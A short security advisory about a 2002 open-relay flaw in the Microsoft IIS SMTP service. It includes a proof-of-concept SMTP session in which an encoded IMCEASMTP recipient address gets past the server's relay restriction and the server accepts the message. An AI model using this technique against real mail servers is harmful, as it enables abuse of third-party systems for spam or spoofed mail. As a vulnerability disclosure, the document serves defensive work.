|
Microsoft IIS SMTP Service Encapsulated SMTP Address Vulnerability
A proof of concept has been provided by JWC@portcullis-security.com: 220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100 helo 250 test-mailer Hello [IP address of source host] MAIL FROM: test@test.com 250 2.1.0 test@test.com....Sender OK RCPT TO: test2@test.com 550 5.7.1 Unable to relay for test@test.com RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk 250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk data 354 Start mail input; end with <CRLF>.<CRLF> Subject: You are vulnerable. |
|
|
Privacy Statement |
